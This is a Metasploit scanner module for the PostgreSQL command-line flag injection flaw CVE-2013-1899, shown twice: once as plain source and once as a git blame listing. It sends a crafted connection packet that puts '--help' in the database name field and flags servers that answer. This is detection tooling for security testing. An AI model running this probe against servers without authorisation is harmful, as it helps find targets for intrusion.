metasploit-framework/modules/auxiliary/scanner/postgres/postgres_dbname_flag_inject...

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Creates an instance of this module.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PostgreSQL Database Name Command Line Flag Injection',
      'Description'    => %q{
        This module can identify PostgreSQL 9.0, 9.1, and 9.2 servers that are
        vulnerable to command-line flag injection through CVE-2013-1899. This
        can lead to denial of service, privilege escalation, or even arbitrary
        code execution.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-1899' ],
          [ 'URL', 'http://www.postgresql.org/support/security/faq/2013-04-04/' ]
        ]
    ))

    register_options([ Opt::RPORT(5432) ])
  end

  def run_host(ip)

    request =
      "\x00\x03\x00\x00" +
      "user\x00" +
      Rex::Text.rand_text_alpha(rand(4)+4) + "\x00" +
      "database\x00" +
      "--help\x00" +
      "application_name\x00" +
      Rex::Text.rand_text_alpha(rand(4)+4) + "\x00\x00"

    connect

    probe = [request.length + 4].pack("N") + request

    sock.put(probe)
    resp = sock.get_once(-1, 5)

    if resp.to_s =~ /process_postgres_switches/
      proof = resp[4, resp.length-4].to_s.gsub("\x00", " ")

      print_good("#{rhost}:#{rport} is vulnerable to CVE-2013-1899: #{proof}")
      report_vuln({
        :host	=> rhost,
        :port	=> rport,
        :proto  => 'tcp',
        :sname  => 'postgres',
        :name	=> self.name,
        :info	=> "Vulnerable: " + proof,
        :refs   => self.references
      })
    elsif resp.to_s =~ /pg_hba\.conf/
      print_error("#{rhost}:#{rport} does not allow connections from us")
    else
      print_status("#{rhost}:#{rport} does not appear to be vulnerable to CVE-2013-1899")
    end
  end
end
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Auxiliary`
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`# Creates an instance of this module.`
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'PostgreSQL Database Name Command Line Flag Injection',`
			`'Description' => %q{`
			`This module can identify PostgreSQL 9.0, 9.1, and 9.2 servers that are`
			`vulnerable to command-line flag injection through CVE-2013-1899. This`
			`can lead to denial of service, privilege escalation, or even arbitrary`
			`code execution.`
			`},`
			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2013-1899' ],`
			`[ 'URL', 'http://www.postgresql.org/support/security/faq/2013-04-04/' ]`
			`]`
			`))`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`register_options([ Opt::RPORT(5432) ])`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run_host(ip)`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`request =`
			`"\x00\x03\x00\x00" +`
			`"user\x00" +`
			`Rex::Text.rand_text_alpha(rand(4)+4) + "\x00" +`
			`"database\x00" +`
			`"--help\x00" +`
			`"application_name\x00" +`
			`Rex::Text.rand_text_alpha(rand(4)+4) + "\x00\x00"`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`connect`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`probe = [request.length + 4].pack("N") + request`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sock.put(probe)`
			`resp = sock.get_once(-1, 5)`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if resp.to_s =~ /process_postgres_switches/`
			`proof = resp[4, resp.length-4].to_s.gsub("\x00", " ")`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_good("#{rhost}:#{rport} is vulnerable to CVE-2013-1899: #{proof}")`
			`report_vuln({`
			`:host => rhost,`
			`:port => rport,`
			`:proto => 'tcp',`
			`:sname => 'postgres',`
			`:name => self.name,`
			`:info => "Vulnerable: " + proof,`
			`:refs => self.references`
			`})`
It's a filename, so not trying to match any single char 2013-04-09 15:20:52 +00:00			`elsif resp.to_s =~ /pg_hba\.conf/`
Improve Postgres CVE-2013-1899 to detect unauthorized connections 2013-04-08 16:55:23 +00:00			`print_error("#{rhost}:#{rport} does not allow connections from us")`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
			`print_status("#{rhost}:#{rport} does not appear to be vulnerable to CVE-2013-1899")`
			`end`
			`end`
Add scanner module for the new PostgreSQL flaw 2013-04-04 15:19:47 +00:00			`end`